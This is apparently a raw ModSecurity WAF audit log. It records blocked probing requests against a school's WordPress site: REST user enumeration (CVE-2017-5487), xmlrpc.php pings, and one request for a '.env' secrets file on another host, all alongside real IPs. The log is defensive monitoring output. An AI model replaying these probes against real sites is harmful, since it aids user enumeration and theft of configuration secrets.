(http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1b3946b-Z-- --a6265b09-A-- [08/May/2025:17:28:00 +0700] aByHMMP9GxxPAbCroFYiAwAAAEs 103.236.140.4 59152 103.236.140.4 8181 --a6265b09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.10.29.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.10.29.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6265b09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6265b09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746700080065818 2333 (- - -) Stopwatch2: 1746700080065818 2333; combined=1146, p1=360, p2=753, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6265b09-Z-- --87857502-A-- [08/May/2025:17:29:07 +0700] aByHc8P9GxxPAbCroFYiBgAAAEM 103.236.140.4 59160 103.236.140.4 8181 --87857502-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87857502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87857502-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746700147071120 3326 (- - -) Stopwatch2: 1746700147071120 3326; combined=1422, p1=492, p2=898, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87857502-Z-- --abf1f934-A-- [08/May/2025:17:29:12 +0700] aByHeMP9GxxPAbCroFYiBwAAAFE 103.236.140.4 59164 103.236.140.4 8181 --abf1f934-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abf1f934-C-- demo.sayHello --abf1f934-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abf1f934-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746700152751174 7053 (- - -) Stopwatch2: 1746700152751174 7053; combined=5021, p1=683, p2=4088, p3=38, p4=42, p5=101, sr=143, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abf1f934-Z-- --7c0d6c7e-A-- [08/May/2025:17:41:56 +0700] aByKdMP9GxxPAbCroFYiIQAAAFc 103.236.140.4 59256 103.236.140.4 8181 --7c0d6c7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c0d6c7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c0d6c7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746700916870157 3042 (- - -) Stopwatch2: 1746700916870157 3042; combined=1274, p1=424, p2=821, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c0d6c7e-Z-- --718a9a6b-A-- [08/May/2025:17:42:02 +0700] aByKesP9GxxPAbCroFYiIwAAAEw 103.236.140.4 59260 103.236.140.4 8181 --718a9a6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --718a9a6b-C-- demo.sayHello --718a9a6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --718a9a6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746700922922204 5924 (- - -) Stopwatch2: 1746700922922204 5924; combined=4366, p1=557, p2=3585, p3=31, p4=34, p5=94, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --718a9a6b-Z-- --eda08805-A-- [08/May/2025:17:44:32 +0700] aByLEKcs1DvJ_HgMHE9WqAAAAAw 103.236.140.4 59278 103.236.140.4 8181 --eda08805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eda08805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eda08805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746701072622972 3316 (- - -) Stopwatch2: 1746701072622972 3316; combined=1448, p1=509, p2=908, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eda08805-Z-- --55e6fe7e-A-- [08/May/2025:17:44:38 +0700] aByLFqcs1DvJ_HgMHE9WqgAAABM 103.236.140.4 59282 103.236.140.4 8181 --55e6fe7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55e6fe7e-C-- demo.sayHello --55e6fe7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e6fe7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746701078392215 6665 (- - -) Stopwatch2: 1746701078392215 6665; combined=4749, p1=623, p2=3842, p3=71, p4=43, p5=101, sr=82, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55e6fe7e-Z-- --f9a2ab7b-A-- [08/May/2025:17:58:22 +0700] aByOTo4K347NtBcwXKxYRAAAAI4 103.236.140.4 59396 103.236.140.4 8181 --f9a2ab7b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.218.7.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.218.7.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9a2ab7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a2ab7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746701902940618 3124 (- - -) Stopwatch2: 1746701902940618 3124; combined=1289, p1=439, p2=819, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a2ab7b-Z-- --b90e3575-A-- [08/May/2025:18:07:38 +0700] aByQesP9GxxPAbCroFYiTQAAAEw 103.236.140.4 59452 103.236.140.4 8181 --b90e3575-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.159.141.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.159.141.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b90e3575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b90e3575-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746702458243997 3326 (- - -) Stopwatch2: 1746702458243997 3326; combined=1466, p1=513, p2=920, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b90e3575-Z-- --0d57b555-A-- [08/May/2025:18:10:37 +0700] aByRLcP9GxxPAbCroFYiTgAAAFI 103.236.140.4 59458 103.236.140.4 8181 --0d57b555-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d57b555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d57b555-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746702637000026 3334 (- - -) Stopwatch2: 1746702637000026 3334; combined=1502, p1=507, p2=963, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d57b555-Z-- --4af7cf31-A-- [08/May/2025:18:10:41 +0700] aByRMcP9GxxPAbCroFYiUAAAAEk 103.236.140.4 59462 103.236.140.4 8181 --4af7cf31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4af7cf31-C-- demo.sayHello --4af7cf31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4af7cf31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746702641876858 5735 (- - -) Stopwatch2: 1746702641876858 5735; combined=4177, p1=540, p2=3410, p3=28, p4=31, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4af7cf31-Z-- --356f6b71-A-- [08/May/2025:18:40:49 +0700] aByYQY4K347NtBcwXKxa3wAAAIs 103.236.140.4 38888 103.236.140.4 8181 --356f6b71-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 45.148.10.172 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-N960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --356f6b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --356f6b71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746704449492010 797 (- - -) Stopwatch2: 1746704449492010 797; combined=322, p1=283, p2=0, p3=0, p4=0, p5=39, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --356f6b71-Z-- --04cc8666-A-- [08/May/2025:19:11:14 +0700] aByfYo4K347NtBcwXKxgawAAAJM 103.236.140.4 47896 103.236.140.4 8181 --04cc8666-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04cc8666-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04cc8666-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706274294447 3124 (- - -) Stopwatch2: 1746706274294447 3124; combined=1287, p1=466, p2=795, p3=0, p4=0, p5=26, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04cc8666-Z-- --27f1611e-A-- [08/May/2025:19:11:25 +0700] aByfbacs1DvJ_HgMHE9fBwAAABI 103.236.140.4 47920 103.236.140.4 8181 --27f1611e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --27f1611e-C-- demo.sayHello --27f1611e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --27f1611e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746706285198563 14265 (- - -) Stopwatch2: 1746706285198563 14265; combined=11658, p1=1963, p2=9189, p3=106, p4=205, p5=124, sr=89, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27f1611e-Z-- --c5ecf110-A-- [08/May/2025:19:11:26 +0700] aByfbis5rYyn3jlLjjIVFQAAAMk 103.236.140.4 47922 103.236.140.4 8181 --c5ecf110-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.151.206.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.151.206.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5ecf110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5ecf110-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706286239887 2758 (- - -) Stopwatch2: 1746706286239887 2758; combined=1339, p1=473, p2=838, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5ecf110-Z-- --15b3ce19-A-- [08/May/2025:19:15:25 +0700] aBygXSs5rYyn3jlLjjIVFwAAAMI 103.236.140.4 47940 103.236.140.4 8181 --15b3ce19-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15b3ce19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15b3ce19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706525307765 3386 (- - -) Stopwatch2: 1746706525307765 3386; combined=1404, p1=473, p2=899, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15b3ce19-Z-- --a458501b-A-- [08/May/2025:19:15:27 +0700] aBygX44K347NtBcwXKxgdAAAAJY 103.236.140.4 47944 103.236.140.4 8181 --a458501b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a458501b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a458501b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746706527610962 2162 (- - -) Stopwatch2: 1746706527610962 2162; combined=1061, p1=354, p2=678, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: 